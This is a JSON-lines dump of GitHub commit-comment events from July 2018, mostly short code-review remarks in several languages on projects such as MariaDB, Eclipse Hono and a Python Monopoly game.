{"id":"7921242290","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29601943,"position":8,"line":8,"path":"lohica-js-network/src/actions/modifyUserDataAction.js","commit_id":"121555b15d54b62e9cbe377af9d911ed1ead1fef","created_at":"2018-07-05T06:39:31Z","updated_at":"2018-07-05T06:39:31Z","author_association":"NONE","body":"looks good"}},"created_at":"2018-07-05T06:39:31Z"}
{"id":"7921242729","type":"CommitCommentEvent","actor":{"login":"Jack-Cherish"},"repo":{"name":"Jack-Cherish/python-spider"},"payload":{"comment":{"id":29601944,"position":null,"line":null,"path":null,"commit_id":"54c9d32c88f065bb26edc5b10ef3baa3a1694303","created_at":"2018-07-05T06:39:39Z","updated_at":"2018-07-05T06:39:39Z","author_association":"OWNER","body":"@waterwater98 添加了参数验证，不太好搞了。\r\n"}},"created_at":"2018-07-05T06:39:39Z"}
{"id":"7921243368","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29601946,"position":12,"line":4414,"path":"sql/sql_class.cc","commit_id":"ae730dcd6cb73c1630a773ae2cd921978dc72d90","created_at":"2018-07-05T06:39:51Z","updated_at":"2018-07-05T06:39:51Z","author_association":"CONTRIBUTOR","body":"We do not seem to need any change for this file."}},"created_at":"2018-07-05T06:39:51Z"}
{"id":"7921243696","type":"CommitCommentEvent","actor":{"login":"mdamien"},"repo":{"name":"regardscitoyens/lawfactory_utils"},"payload":{"comment":{"id":29601949,"position":null,"line":null,"path":null,"commit_id":"6df5aab20dd212e5218d4ed0f1c825738a9d94c8","created_at":"2018-07-05T06:39:58Z","updated_at":"2018-07-05T06:39:58Z","author_association":"MEMBER","body":"yup, it's simply doing a `tlfp-parse http://www.assemblee-nationale.fr/14/dossiers/retablissement_confiance_action_publique.asp` (in this direction, instead of starting with the senat dosleg)"}},"created_at":"2018-07-05T06:39:58Z"}
{"id":"7921249997","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29601957,"position":29,"line":54,"path":"lohica-js-network/src/components/inputComponents/GenderRadio.js","commit_id":"121555b15d54b62e9cbe377af9d911ed1ead1fef","created_at":"2018-07-05T06:41:54Z","updated_at":"2018-07-05T06:41:54Z","author_association":"NONE","body":"checkValue && checkValue === 'Male' is enough"}},"created_at":"2018-07-05T06:41:54Z"}
{"id":"7921250346","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29601958,"position":35,"line":60,"path":"lohica-js-network/src/components/inputComponents/GenderRadio.js","commit_id":"121555b15d54b62e9cbe377af9d911ed1ead1fef","created_at":"2018-07-05T06:42:00Z","updated_at":"2018-07-05T06:42:00Z","author_association":"NONE","body":"the same"}},"created_at":"2018-07-05T06:42:00Z"}
{"id":"7921255470","type":"CommitCommentEvent","actor":{"login":"strogonoff"},"repo":{"name":"riboseinc/open.ribose.com"},"payload":{"comment":{"id":29601971,"position":null,"line":null,"path":null,"commit_id":"1f422ad1f14bfadacc63cee4aa600a89345804f1","created_at":"2018-07-05T06:43:30Z","updated_at":"2018-07-05T06:43:30Z","author_association":"CONTRIBUTOR","body":"@kwkwan (or maybe @ronaldtse knows) with these HTTPS URLs, were there issues with GitHub asking for password during Jekyll build? Do you need to store GitHub account password on CI runner machine?"}},"created_at":"2018-07-05T06:43:30Z"}
{"id":"7921258412","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29601974,"position":6,"line":8,"path":"lohica-js-network/src/reducers/inputValidate.js","commit_id":"121555b15d54b62e9cbe377af9d911ed1ead1fef","created_at":"2018-07-05T06:44:23Z","updated_at":"2018-07-05T06:44:23Z","author_association":"NONE","body":"to not import all the constants by hands they can be grouped in USER_ACTIONS and here you will import only one line"}},"created_at":"2018-07-05T06:44:23Z"}
{"id":"7921258540","type":"CommitCommentEvent","actor":{"login":"ronaldtse"},"repo":{"name":"riboseinc/open.ribose.com"},"payload":{"comment":{"id":29601975,"position":null,"line":null,"path":null,"commit_id":"1f422ad1f14bfadacc63cee4aa600a89345804f1","created_at":"2018-07-05T06:44:25Z","updated_at":"2018-07-05T06:44:25Z","author_association":"CONTRIBUTOR","body":"@strogonoff as these repos are public, anyone can clone them, so there's no username/password issue."}},"created_at":"2018-07-05T06:44:25Z"}
{"id":"7921259515","type":"CommitCommentEvent","actor":{"login":"dr-m"},"repo":{"name":"MariaDB/server"},"payload":{"comment":{"id":29601977,"position":17,"line":21612,"path":"storage/innobase/handler/ha_innodb.cc","commit_id":"ae730dcd6cb73c1630a773ae2cd921978dc72d90","created_at":"2018-07-05T06:44:43Z","updated_at":"2018-07-05T06:44:43Z","author_association":"CONTRIBUTOR","body":"MDL is an abbreviation for \"metadata lock\". We should not repeat the word \"lock\", either in comments or in function names. Also, I would write \"innodb\" instead of \"innobase\" and avoid using the word \"mysql\" where it is not needed. MDL is on table names; it is kind of a predicate lock, not directly attached to `TABLE` or `TABLE_SHARE`. Similarly, `thd` can simply be called \"thread handle\"."}},"created_at":"2018-07-05T06:44:43Z"}
{"id":"7921263086","type":"CommitCommentEvent","actor":{"login":"gavrilenco"},"repo":{"name":"ColeMaddison/Lohika_JS_Coding_Camp"},"payload":{"comment":{"id":29601987,"position":80,"line":147,"path":"lohica-js-network/src/reducers/inputValidate.js","commit_id":"121555b15d54b62e9cbe377af9d911ed1ead1fef","created_at":"2018-07-05T06:45:50Z","updated_at":"2018-07-05T06:45:50Z","author_association":"NONE","body":"why not to use calculated fields? [fieldName]: value"}},"created_at":"2018-07-05T06:45:50Z"}
{"id":"7921263446","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29601988,"position":5,"line":43,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnection.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T06:45:56Z","updated_at":"2018-07-05T06:45:56Z","author_association":"CONTRIBUTOR","body":"@pellmann the name of this method seems to imply that consumers will be cached, i.e. not be closed after a command has been received over it. If this is the case, then the JavaDoc needs to be adapted accordingly. Otherwise, the name is misleading and should be changed back to its original value."}},"created_at":"2018-07-05T06:45:56Z"}
{"id":"7921266304","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29601989,"position":64,"line":100,"path":"monopoly.py","commit_id":"c9cfcb7de029e7dcdd246adf7bf8fd3d04d17b95","created_at":"2018-07-05T06:46:51Z","updated_at":"2018-07-05T06:46:51Z","author_association":"NONE","body":"Not sure what the plan here is, but it might not be doing what you think.\r\n\r\n`Property.name = 'Mediterranean Avenue'` is setting the `name` attribute on the `Property` class, not setting the `name` attribute on an instance of `MediterraneanAvenue`.\r\n\r\nThat is, if you had:\r\n\r\n```\r\nclass MediterraneanAvenue(Property):\r\n    Property.name = 'Mediterranean Avenue'\r\n\r\nclass ParkPlace(Property):\r\n    Property.name = 'Park Place'\r\n\r\nprint(MediterraneanAvenue.name)\r\n```\r\n\r\nIt would print \"Park Place\", because the definition for the `ParkPlace` class executed last, and overwrote `Property.name`. Both class definitions set that property and the last one to set it is the value you remain with.\r\n"}},"created_at":"2018-07-05T06:46:51Z"}
{"id":"7921270011","type":"CommitCommentEvent","actor":{"login":"junzijian"},"repo":{"name":"junzijian/JD"},"payload":{"comment":{"id":29601993,"position":null,"line":null,"path":null,"commit_id":"d255ccc257e0242b81e204f413a625bdc7b516aa","created_at":"2018-07-05T06:48:00Z","updated_at":"2018-07-05T06:48:00Z","author_association":"OWNER","body":"通过gh-pages分支展示静态页面"}},"created_at":"2018-07-05T06:48:00Z"}
{"id":"7921271015","type":"CommitCommentEvent","actor":{"login":"draeger"},"repo":{"name":"shalinshah1993/SBSCL"},"payload":{"comment":{"id":29601996,"position":7,"line":238,"path":"pom.xml","commit_id":"24521206cabbb4058408fc389e62892db70a353c","created_at":"2018-07-05T06:48:17Z","updated_at":"2018-07-05T06:48:17Z","author_association":"COLLABORATOR","body":"It is not necessary to run an extra script. Maven is able to directly find the library if the folder structure inside of the lib folder is identical to how maven stores libraries in its `.m2` directory (which you can find this one in your home folder) and by declaring the `src/lib` as a local repository in the `pom.xml`. This would be much better because then the project would run out of the box without the need to run anything else but `mvn clean install`."}},"created_at":"2018-07-05T06:48:17Z"}
{"id":"7921273233","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29602004,"position":70,"line":106,"path":"monopoly.py","commit_id":"c9cfcb7de029e7dcdd246adf7bf8fd3d04d17b95","created_at":"2018-07-05T06:48:55Z","updated_at":"2018-07-05T06:48:55Z","author_association":"NONE","body":"If `ParkPlace` doesn't change any _behavior_ of `Property`, you don't need to make it a subclass. You could just as well do:\r\n\r\n```\r\nproperties.append(Property(\"Mediterranean Avenue\", 60, \"green\"))\r\nproperties.append(Property(\"Park Place\", 200, \"blue\"))\r\n...\r\n```"}},"created_at":"2018-07-05T06:48:55Z"}
{"id":"7921276593","type":"CommitCommentEvent","actor":{"login":"atherdon"},"repo":{"name":"vadim9999/groceristar-fetch"},"payload":{"comment":{"id":29602010,"position":3,"line":3,"path":"data/Users/usersData.json","commit_id":"d5010cf05f746a2a3434f5c0f072f2b8a626b0f1","created_at":"2018-07-05T06:49:56Z","updated_at":"2018-07-05T06:49:56Z","author_association":"NONE","body":"as you can see - data is red here. please compare with other json arrays and update it"}},"created_at":"2018-07-05T06:49:56Z"}
{"id":"7921281360","type":"CommitCommentEvent","actor":{"login":"netskopegittest1"},"repo":{"name":"Scaleskope-Ind/Org_Apic_Auto_Repo"},"payload":{"comment":{"id":29602019,"position":1,"line":1,"path":"new_test_1530773463.txt","commit_id":"457e2f5c69638ea6534171997acf0c7e58263e41","created_at":"2018-07-05T06:51:17Z","updated_at":"2018-07-05T06:51:17Z","author_association":"NONE","body":"Needs to be change this!!!"}},"created_at":"2018-07-05T06:51:17Z"}
{"id":"7921284309","type":"CommitCommentEvent","actor":{"login":"pellmann"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602021,"position":5,"line":43,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnection.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T06:52:08Z","updated_at":"2018-07-05T06:52:08Z","author_association":"CONTRIBUTOR","body":"Yes, the consumer will be cached."}},"created_at":"2018-07-05T06:52:08Z"}
{"id":"7921285110","type":"CommitCommentEvent","actor":{"login":"cyj8705"},"repo":{"name":"cyj8705/cyj"},"payload":{"comment":{"id":29602022,"position":null,"line":null,"path":null,"commit_id":"125a3e7f51380d7edcf9df83acb10a2686f804d4","created_at":"2018-07-05T06:52:20Z","updated_at":"2018-07-05T06:52:20Z","author_association":"OWNER","body":"테스트용"}},"created_at":"2018-07-05T06:52:20Z"}
{"id":"7921285482","type":"CommitCommentEvent","actor":{"login":"divjuhi"},"repo":{"name":"divjuhi/Hello-world"},"payload":{"comment":{"id":29602024,"position":null,"line":null,"path":null,"commit_id":"ec2cafbcba01dbc51260738215f79086736fbf29","created_at":"2018-07-05T06:52:26Z","updated_at":"2018-07-05T06:52:26Z","author_association":"OWNER","body":"are you sure about this change?"}},"created_at":"2018-07-05T06:52:26Z"}
{"id":"7921286371","type":"CommitCommentEvent","actor":{"login":"wolfs"},"repo":{"name":"xvik/gradle-animalsniffer-plugin"},"payload":{"comment":{"id":29602025,"position":14,"line":74,"path":"src/main/groovy/ru/vyarus/gradle/plugin/animalsniffer/signature/BuildSignatureTask.groovy","commit_id":"c16b00aff5c4db48313fd571ba4bcd85e649393c","created_at":"2018-07-05T06:52:43Z","updated_at":"2018-07-05T06:52:43Z","author_association":"NONE","body":"I don't quite understand. Does that mean a user cannot configure (i.e. add files to) that property? Why not remove the property altogether? If it should be modifiable by users, please use `project.files()` which returns a `ConfigurableFileCollection`."}},"created_at":"2018-07-05T06:52:43Z"}
{"id":"7921288600","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29602026,"position":89,"line":130,"path":"monopoly.py","commit_id":"c9cfcb7de029e7dcdd246adf7bf8fd3d04d17b95","created_at":"2018-07-05T06:53:20Z","updated_at":"2018-07-05T06:53:20Z","author_association":"NONE","body":"Stylistically, I think that there should be a `Structure` class, so you can do `structure.value` (or something)."}},"created_at":"2018-07-05T06:53:20Z"}
{"id":"7921291579","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602030,"position":28,"line":46,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T06:54:11Z","updated_at":"2018-07-05T06:54:11Z","author_association":"CONTRIBUTOR","body":"@pellmann missing JavaDoc for protected declaration"}},"created_at":"2018-07-05T06:54:11Z"}
{"id":"7921301321","type":"CommitCommentEvent","actor":{"login":"gedasprojektai"},"repo":{"name":"babel/website"},"payload":{"comment":{"id":29602037,"position":24,"line":410,"path":"js/repl/ReplOptions.js","commit_id":"b1d4234a78d4e9731a25c3c5cfe21e8b5bc206c7","created_at":"2018-07-05T06:56:49Z","updated_at":"2018-07-05T06:56:49Z","author_association":"NONE","body":"ojp"}},"created_at":"2018-07-05T06:56:49Z"}
{"id":"7921301934","type":"CommitCommentEvent","actor":{"login":"allanrenucci"},"repo":{"name":"lampepfl/dotty"},"payload":{"comment":{"id":29602038,"position":null,"line":null,"path":null,"commit_id":"94b2d8106019067ea2890702c63f39578db06662","created_at":"2018-07-05T06:57:01Z","updated_at":"2018-07-05T06:57:01Z","author_association":"CONTRIBUTOR","body":"Fetching the git commit sha and date was not properly working on windows (see this [comment](https://github.com/lampepfl/dotty/pull/4680#issuecomment-398268970)).\r\n\r\nThis is probably the most reliable way to have something that work on both Windows, Linux and Mac"}},"created_at":"2018-07-05T06:57:01Z"}
{"id":"7921303806","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602040,"position":61,"line":88,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T06:57:32Z","updated_at":"2018-07-05T06:57:32Z","author_association":"CONTRIBUTOR","body":"@pellmann since this method does nothing, it should be inlined into the only place where it is used (in getOrCreateCommandConsumer) IMHO."}},"created_at":"2018-07-05T06:57:32Z"}
{"id":"7921306066","type":"CommitCommentEvent","actor":{"login":"dragg"},"repo":{"name":"Praddby/LearningLanguageWithFlashcards"},"payload":{"comment":{"id":29602042,"position":16,"line":16,"path":"database/seeds/RolesSeeder.php","commit_id":"a5e557cde879287464ea4e42285ac35e07722cf8","created_at":"2018-07-05T06:58:10Z","updated_at":"2018-07-05T06:58:10Z","author_association":"COLLABORATOR","body":"Почему все роли с 1 в конце?!"}},"created_at":"2018-07-05T06:58:10Z"}
{"id":"7921310607","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602045,"position":18,"line":640,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T06:59:27Z","updated_at":"2018-07-05T06:59:27Z","author_association":"COLLABORATOR","body":"WHERE pa.approved = ?s AND payout_id = 0 ?p ?p"}},"created_at":"2018-07-05T06:59:27Z"}
{"id":"7921313707","type":"CommitCommentEvent","actor":{"login":"torunar"},"repo":{"name":"cscart/docs"},"payload":{"comment":{"id":29602059,"position":20,"line":642,"path":"en/developer_guide/core/coding_standards/php.rst","commit_id":"f9761876d331d1c95ebc8f9f9ef1f7968195e637","created_at":"2018-07-05T07:00:19Z","updated_at":"2018-07-05T07:00:19Z","author_association":"COLLABORATOR","body":"`'partner_id', 'Y', $condition, $group`"}},"created_at":"2018-07-05T07:00:19Z"}
{"id":"7921314794","type":"CommitCommentEvent","actor":{"login":"dawitde2"},"repo":{"name":"dawitde2/sql"},"payload":{"comment":{"id":29602065,"position":null,"line":null,"path":null,"commit_id":"ae86a7ca67eb8949fcb4da3275835716eaaaba27","created_at":"2018-07-05T07:00:36Z","updated_at":"2018-07-05T07:00:36Z","author_association":"OWNER","body":"why do you modified this "}},"created_at":"2018-07-05T07:00:36Z"}
{"id":"7921315893","type":"CommitCommentEvent","actor":{"login":"Hathaway12138"},"repo":{"name":"xjdexjt/haoshi"},"payload":{"comment":{"id":29602066,"position":null,"line":null,"path":null,"commit_id":"e5b7585bef5d91eab930f0742e37ae0514f51a7c","created_at":"2018-07-05T07:00:54Z","updated_at":"2018-07-05T07:00:54Z","author_association":"COLLABORATOR","body":"asdasddddddddddddddddddddddddddddddddddddddd"}},"created_at":"2018-07-05T07:00:54Z"}
{"id":"7921316318","type":"CommitCommentEvent","actor":{"login":"ycbxklk"},"repo":{"name":"ycbxklk/firefly-proxy"},"payload":{"comment":{"id":29602067,"position":null,"line":null,"path":null,"commit_id":"60161af7b239ab400d39a23b61ab312f84b94570","created_at":"2018-07-05T07:01:00Z","updated_at":"2018-07-05T07:01:00Z","author_association":"OWNER","body":"update"}},"created_at":"2018-07-05T07:01:00Z"}
{"id":"7921316884","type":"CommitCommentEvent","actor":{"login":"mastercoms"},"repo":{"name":"mastercoms/mastercomfig"},"payload":{"comment":{"id":29602069,"position":null,"line":null,"path":null,"commit_id":"0e1807631e31dec5209e72770c7426a835e9d792","created_at":"2018-07-05T07:01:11Z","updated_at":"2018-07-05T07:01:11Z","author_association":"OWNER","body":"Note: built with `CXXFLAGS=\"-Wno-ignored-qualifiers -Wno-stringop-truncation -Wno-cast-function-type\"`"}},"created_at":"2018-07-05T07:01:11Z"}
{"id":"7921318652","type":"CommitCommentEvent","actor":{"login":"ErmolaevAM"},"repo":{"name":"AgurovaL/JavaSummerPractice2018"},"payload":{"comment":{"id":29602073,"position":30,"line":20,"path":"src/main/java/com/agurova/models/Image.java","commit_id":"7b82a74db0f0dcd52be0379487e9d9e0f8363b5e","created_at":"2018-07-05T07:01:39Z","updated_at":"2018-07-05T07:01:39Z","author_association":"COLLABORATOR","body":"Зачем нужны get/set методы, если над классом есть аннотация @Data"}},"created_at":"2018-07-05T07:01:39Z"}
{"id":"7921323730","type":"CommitCommentEvent","actor":{"login":"m0xb"},"repo":{"name":"WorryingWonton/Monopoly"},"payload":{"comment":{"id":29602080,"position":67,"line":103,"path":"monopoly.py","commit_id":"c9cfcb7de029e7dcdd246adf7bf8fd3d04d17b95","created_at":"2018-07-05T07:02:59Z","updated_at":"2018-07-05T07:02:59Z","author_association":"NONE","body":"Seems like you would just want to have structure types (e.g. \"house\" and \"hotel\") and have a list containing those strings here. I don't see why `possible_structures` would need to have the structure value."}},"created_at":"2018-07-05T07:02:59Z"}
{"id":"7921327504","type":"CommitCommentEvent","actor":{"login":"kissymv520"},"repo":{"name":"kissymv520/shell"},"payload":{"comment":{"id":29602087,"position":null,"line":null,"path":null,"commit_id":"c8aed9870785007ec7a01badbb0bb426962334e8","created_at":"2018-07-05T07:04:03Z","updated_at":"2018-07-05T07:04:03Z","author_association":"OWNER","body":"ssh登录email邮件告警"}},"created_at":"2018-07-05T07:04:03Z"}
{"id":"7921330317","type":"CommitCommentEvent","actor":{"login":"DivingPigy"},"repo":{"name":"shenshuai89/vueGentelella"},"payload":{"comment":{"id":29602091,"position":null,"line":null,"path":null,"commit_id":"51592a2d3ccfee48dd3cae77a54516872e3e6602","created_at":"2018-07-05T07:04:47Z","updated_at":"2018-07-05T07:04:47Z","author_association":"NONE","body":"对，这个地方加一个依赖"}},"created_at":"2018-07-05T07:04:47Z"}
{"id":"7921331950","type":"CommitCommentEvent","actor":{"login":"montreal91"},"repo":{"name":"pzycloni/semantic_network"},"payload":{"comment":{"id":29602094,"position":6,"line":6,"path":"source.py","commit_id":"6100619ab7216cd50b456ec26d5f19bb76511cdf","created_at":"2018-07-05T07:05:16Z","updated_at":"2018-07-05T07:05:16Z","author_association":"NONE","body":"Для Python лучше использовать в качестве отступов 4 пробела, а не табы. [Гугл](https://github.com/google/styleguide/blob/gh-pages/pyguide.md#34-indentation) вообще не рекомендует табы использовать."}},"created_at":"2018-07-05T07:05:16Z"}
{"id":"7921332531","type":"CommitCommentEvent","actor":{"login":"spelle"},"repo":{"name":"spelle/obfuscator"},"payload":{"comment":{"id":29602096,"position":null,"line":null,"path":null,"commit_id":"571624df82aaa4a3a3571e30db2dd231047c6e32","created_at":"2018-07-05T07:05:23Z","updated_at":"2018-07-05T07:05:23Z","author_association":"OWNER","body":"Well, I solved the string encryption issue by moving obfuscation passes to the end of the PassManager. So that string encrytption is not optimized.\r\n\r\nA crash still occurs in some cases within the string encryption on an iOS project..."}},"created_at":"2018-07-05T07:05:23Z"}
{"id":"7921334408","type":"CommitCommentEvent","actor":{"login":"olleharstedt"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29602100,"position":null,"line":null,"path":null,"commit_id":"00990367a1e06dd0a4773c9a48f1c820f9c456bc","created_at":"2018-07-05T07:05:53Z","updated_at":"2018-07-05T07:05:53Z","author_association":"CONTRIBUTOR","body":"OK. Don't forget to check the structure of the activated survey table (lime_survey_xxxxx) to make sure there are no duplicate subquestions or something."}},"created_at":"2018-07-05T07:05:53Z"}
{"id":"7921336358","type":"CommitCommentEvent","actor":{"login":"riiccardo"},"repo":{"name":"kbrsh/moon"},"payload":{"comment":{"id":29602110,"position":null,"line":null,"path":null,"commit_id":"b5c71406a270899e1d12a9a27cfd691f6e2803fe","created_at":"2018-07-05T07:06:25Z","updated_at":"2018-07-05T07:06:25Z","author_association":"NONE","body":":|"}},"created_at":"2018-07-05T07:06:25Z"}
{"id":"7921336459","type":"CommitCommentEvent","actor":{"login":"mbollemeijer"},"repo":{"name":"luizdepra/hugo-coder"},"payload":{"comment":{"id":29602112,"position":null,"line":null,"path":null,"commit_id":"c9d4c83fafc46d9ae9ad1edbc6a29c0df358659e","created_at":"2018-07-05T07:06:26Z","updated_at":"2018-07-05T07:06:26Z","author_association":"CONTRIBUTOR","body":"Yhe oke, you got a point there.\r\nLet`s leave it like this then."}},"created_at":"2018-07-05T07:06:26Z"}
{"id":"7921336729","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29602113,"position":null,"line":null,"path":null,"commit_id":"097a027fb0c2dcc1d3859df22fc7f99be1a9c56b","created_at":"2018-07-05T07:06:31Z","updated_at":"2018-07-05T07:06:31Z","author_association":"COLLABORATOR","body":"Yeah that is the best and easy fix for this :)"}},"created_at":"2018-07-05T07:06:31Z"}
{"id":"7921338499","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"eclipse/hono"},"payload":{"comment":{"id":29602115,"position":53,"line":80,"path":"service-base/src/main/java/org/eclipse/hono/service/command/CommandConnectionImpl.java","commit_id":"ebf7193cd708710c459c0345537bc264274d0df2","created_at":"2018-07-05T07:07:00Z","updated_at":"2018-07-05T07:07:00Z","author_association":"CONTRIBUTOR","body":"@pellmann is there a reason why we do not take the same care here when reusing or creating a new instance as we do in HonoClientImpl, i.e. how do we deal with concurrent requests, what happens if the connection to the AMQP network fails ..."}},"created_at":"2018-07-05T07:07:00Z"}
{"id":"7921340335","type":"CommitCommentEvent","actor":{"login":"aikuma0130"},"repo":{"name":"aikuma0130/githubflow"},"payload":{"comment":{"id":29602118,"position":null,"line":null,"path":null,"commit_id":"286aafc07fe82ba1480edfb8bd1e9717c2587ca5","created_at":"2018-07-05T07:07:27Z","updated_at":"2018-07-05T07:07:27Z","author_association":"OWNER","body":"\"os\" パッケージの ”Args\" を利用して、自分の名前を入れてみてください。"}},"created_at":"2018-07-05T07:07:27Z"}
{"id":"7921340826","type":"CommitCommentEvent","actor":{"login":"montreal91"},"repo":{"name":"pzycloni/semantic_network"},"payload":{"comment":{"id":29602120,"position":4,"line":4,"path":"source.py","commit_id":"6100619ab7216cd50b456ec26d5f19bb76511cdf","created_at":"2018-07-05T07:07:34Z","updated_at":"2018-07-05T07:07:34Z","author_association":"NONE","body":"Также базовые классы, что в Python2, что в Python3 лучше наследовать от `object`. Во имя стабильной работы, конечно же."}},"created_at":"2018-07-05T07:07:34Z"}
{"id":"7921341717","type":"CommitCommentEvent","actor":{"login":"VelentinaSteffi"},"repo":{"name":"VelentinaSteffi/bug-free-tribble"},"payload":{"comment":{"id":29602121,"position":null,"line":null,"path":null,"commit_id":"3dd27a9abe87d9db3d3eb62a21cc5628e4ad3644","created_at":"2018-07-05T07:07:47Z","updated_at":"2018-07-05T07:07:47Z","author_association":"OWNER","body":"Added some changes on version1"}},"created_at":"2018-07-05T07:07:47Z"}
{"id":"7921342286","type":"CommitCommentEvent","actor":{"login":"DmitriVanGuard"},"repo":{"name":"Vetra128/229617-kekstagram"},"payload":{"comment":{"id":29602122,"position":6,"line":28,"path":"js/data.js","commit_id":"292023771d9c591f4e94763ae13cd1094f70b1be","created_at":"2018-07-05T07:07:56Z","updated_at":"2018-07-05T07:07:56Z","author_association":"NONE","body":"Объявлять без инициализации, т.к. потом происходит перезапись на новый массив, а не заполнение существующего"}},"created_at":"2018-07-05T07:07:56Z"}
{"id":"7921350216","type":"CommitCommentEvent","actor":{"login":"TheLimeGlass"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29602131,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T07:09:53Z","updated_at":"2018-07-05T07:09:53Z","author_association":"CONTRIBUTOR","body":"Wtf is this\r\n```\r\nif (join) {\r\n\t\t\treturn new String[] {\r\n\t\t\t\t\tStringUtils.join(\r\n\t\t\t\t\t\t\tStream.of(t).map(Classes::toString).toArray(String[]::new),\r\n\t\t\t\t\t\t\td\r\n\t\t\t\t\t)\r\n\t\t\t};\r\n\t\t} else {\r\n\t\t\treturn ((String) t[0]).split(Pattern.quote(d), -1);\r\n\t\t}\r\n```\r\nYou're just making it worse in terms of being able to \"read\" code by spacing it out like this, wtf."}},"created_at":"2018-07-05T07:09:53Z"}
{"id":"7921350845","type":"CommitCommentEvent","actor":{"login":"Rola1993"},"repo":{"name":"Rola1993/mysite_django"},"payload":{"comment":{"id":29602133,"position":null,"line":null,"path":null,"commit_id":"43991a81817de9252042f7f3b44d9e2d2b522694","created_at":"2018-07-05T07:10:03Z","updated_at":"2018-07-05T07:10:03Z","author_association":"OWNER","body":"Hi Sean, thank you for your advice. I am sorry I just find this comment. I will do it right now. \r\nOne thing I want to mention is that I just find that the project profile mistakenly shows another contributor.\r\nIt was because of some configuration problem when I tried to link it to digitalOcean, still haven't figure out how it happened. But all of the code is produced by me. Just want to clarify I am not a cheater :( \r\nThank you for taking a look at it and giving me this suggestion again!"}},"created_at":"2018-07-05T07:10:03Z"}
{"id":"7921354503","type":"CommitCommentEvent","actor":{"login":"aikuma0130"},"repo":{"name":"aikuma0130/githubflow"},"payload":{"comment":{"id":29602138,"position":null,"line":null,"path":null,"commit_id":"fe562f56a46a3c4b28c62e5897a92d093abe6b36","created_at":"2018-07-05T07:10:56Z","updated_at":"2018-07-05T07:10:56Z","author_association":"OWNER","body":"#2 \r\n\r\n`Hi Hi` の後ろに名前を入れたいのですが、どんな方法が良いですかね？"}},"created_at":"2018-07-05T07:10:56Z"}
{"id":"7921355958","type":"CommitCommentEvent","actor":{"login":"rostovtsev"},"repo":{"name":"webmin/webmin"},"payload":{"comment":{"id":29602140,"position":null,"line":null,"path":null,"commit_id":"dbe8bfb7d6dcaf45374c58c1e7ac9b194fcfd167","created_at":"2018-07-05T07:11:18Z","updated_at":"2018-07-05T07:11:18Z","author_association":"COLLABORATOR","body":"Working as expected. Finally fixed. Thanks."}},"created_at":"2018-07-05T07:11:18Z"}
{"id":"7921358906","type":"CommitCommentEvent","actor":{"login":"neorusse"},"repo":{"name":"neorusse/Pixel-Art-Maker-Project"},"payload":{"comment":{"id":29602149,"position":null,"line":null,"path":null,"commit_id":"8e3fa3a555901b434f9cb9f6cfd379c6ca891265","created_at":"2018-07-05T07:12:02Z","updated_at":"2018-07-05T07:12:02Z","author_association":"OWNER","body":"Thank You,\n\nI have noted your observations, I will effect your recommendations p.\n\nThank You for reviewing my work.\n\nOn Wed, 4 Jul 2018 at 12:51, opara prosper <notifications@github.com> wrote:\n\n> Adding comments to your code makes your code easily readable and even\n> helps you understand what you're trying to achieve. It also earns you an\n> extra credit as a developer.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/neorusse/Pixel-Art-Maker-Project/commit/8e3fa3a555901b434f9cb9f6cfd379c6ca891265#commitcomment-29594122>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AmsEZhFwTC-CNnOMOsFkmJW39jx7C1nGks5uDKwygaJpZM4VCc-8>\n> .\n>\n"}},"created_at":"2018-07-05T07:12:02Z"}
